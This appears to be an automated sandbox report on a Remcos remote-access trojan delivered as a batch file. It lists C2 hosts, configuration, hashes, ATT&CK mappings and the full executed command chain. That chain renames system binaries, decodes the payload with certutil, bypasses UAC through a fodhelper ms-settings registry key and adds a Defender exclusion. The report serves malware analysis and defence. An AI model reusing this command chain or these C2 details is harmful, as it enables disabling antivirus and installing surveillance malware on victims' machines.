Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 10:31

General

  • Target

    f.cmd

  • Size

    4.7MB

  • MD5

    c3a17194e3f679078eee9f539fe1d6f4

  • SHA1

    64defa4bcca8298bc58f30fca4c0cfc561263465

  • SHA256

    b9b8d30d6757b34902ef37849e61eba745f6c5bd476b41f1e993b86bf8099449

  • SHA512

    169a2265c68654cb4b19898772c2ad35c758b4b5d65f2b25be71f724d379bc123fabc2b505cfedb1c09d3b79db8a291a9227988c5e1622631ea7b2cf5aa4efa4

  • SSDEEP

    24576:CN3QGmU4n/+6JVT+avOgeF/ehZ2gRrxBJGhRCAQ:CFQGmdn/+GdRvOX9gRqQ

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

myumysmeetr.ddns.net:2404

mysweeterbk.ddns.net:2404

meetre1ms.freeddns.org:2404

bbhmeetre1ms.freeddns.org:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TPT9X3

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 13 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\f.cmd"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:2420
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        2⤵
        • Executes dropped EXE
        PID:2068
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        2⤵
        • Executes dropped EXE
        PID:2936
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2988
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:2436
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\f.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\f.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
            3⤵
            • Executes dropped EXE
            PID:3000
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2976
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            3⤵
              PID:1300
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2108
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              3⤵
                PID:2664
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2724
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                3⤵
                  PID:2876
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2668
                • C:\Users\Public\xkn.exe
                  C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2648
                  • C:\Users\Public\alpha.exe
                    "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2520
                    • C:\Users\Public\ger.exe
                      C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                      5⤵
                      • Executes dropped EXE
                      • Modifies registry class
                      PID:2536
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2636
                • C:\Users\Public\kn.exe
                  C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                  3⤵
                  • Executes dropped EXE
                  PID:2948
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2356
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM SystemSettings.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2228
              • C:\Users\Public\Libraries\Ping_c.pif
                C:\Users\Public\Libraries\Ping_c.pif
                2⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious behavior: EnumeratesProcesses
                PID:2804
                • C:\Windows\SysWOW64\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Duchpovs.PIF
                  3⤵
                    PID:576
                  • C:\Windows\SysWOW64\SndVol.exe
                    C:\Windows\System32\SndVol.exe
                    3⤵
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:648
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                  2⤵
                  • Executes dropped EXE
                  PID:1652
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                  2⤵
                  • Executes dropped EXE
                  PID:1988
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                  2⤵
                  • Executes dropped EXE
                  PID:1824
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:1772
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:2008
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:1720
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:2252
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:1440

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Modify Registry

              1
              T1112

              Discovery

              System Information Discovery

              1
              T1082

              Command and Control

              Web Service

              1
              T1102

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Public\Libraries\Ping_c.pif
                Filesize

                1.6MB

                MD5

                daa25319da16998892f14c325b28ab32

                SHA1

                f29d0a758e91aaf3180c580350addeadbdd692e7

                SHA256

                2a995cd5579e377b2f9578ea86e12b5c4fa1ce2f49714e6be23148fec2076f99

                SHA512

                7a9f395ea607057b5a31ea39b2b24c5b9d1b4ac73aba3c252434f3873576b5e426611e556d514c6727f646b9cb9d341f51778946e538f406ca4707077a00f2eb

              • C:\Users\Public\Ping_c.mp4
                Filesize

                3.2MB

                MD5

                7fa93293418d2b9c0965fd53183d289b

                SHA1

                70f23a7e303d200baccaae4a46e250c86d18d54e

                SHA256

                6a4c893b3cfe5327d54cbf953ad87d11614191476ebae92e2ac0559c1579f8ee

                SHA512

                e18816dc44446a75402c0774e59a6306ef284d71da204970ab31e6795cf2dca16535f120ad65511c34eb959a6d710e4c8f50d174099ab4fa44ec7c37bffc4295

              • C:\Users\Public\ger.exe
                Filesize

                73KB

                MD5

                9d0b3066fe3d1fd345e86bc7bcced9e4

                SHA1

                e05984a6671fcfecbc465e613d72d42bda35fd90

                SHA256

                4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

                SHA512

                d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

              • \Users\Public\alpha.exe
                Filesize

                337KB

                MD5

                5746bd7e255dd6a8afa06f7c42c1ba41

                SHA1

                0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

                SHA256

                db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

                SHA512

                3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

              • \Users\Public\kn.exe
                Filesize

                1.1MB

                MD5

                ec1fd3050dbc40ec7e87ab99c7ca0b03

                SHA1

                ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

                SHA256

                1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

                SHA512

                4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

              • \Users\Public\xkn.exe
                Filesize

                462KB

                MD5

                852d67a27e454bd389fa7f02a8cbe23f

                SHA1

                5330fedad485e0e4c23b2abe1075a1f984fde9fc

                SHA256

                a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

                SHA512

                327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

              • memory/648-95-0x000000001B5C0000-0x000000001B642000-memory.dmp
                Filesize

                520KB

              • memory/648-96-0x000000001B5C0000-0x000000001B642000-memory.dmp
                Filesize

                520KB

              • memory/648-92-0x000000001B5C0000-0x000000001B642000-memory.dmp
                Filesize

                520KB

              • memory/648-90-0x0000000003030000-0x0000000004030000-memory.dmp
                Filesize

                16.0MB

              • memory/648-97-0x000000001B5C0000-0x000000001B642000-memory.dmp
                Filesize

                520KB

              • memory/2648-44-0x0000000000390000-0x0000000000398000-memory.dmp
                Filesize

                32KB

              • memory/2648-43-0x000000001B550000-0x000000001B832000-memory.dmp
                Filesize

                2.9MB

              • memory/2804-71-0x0000000000400000-0x00000000005A7000-memory.dmp
                Filesize

                1.7MB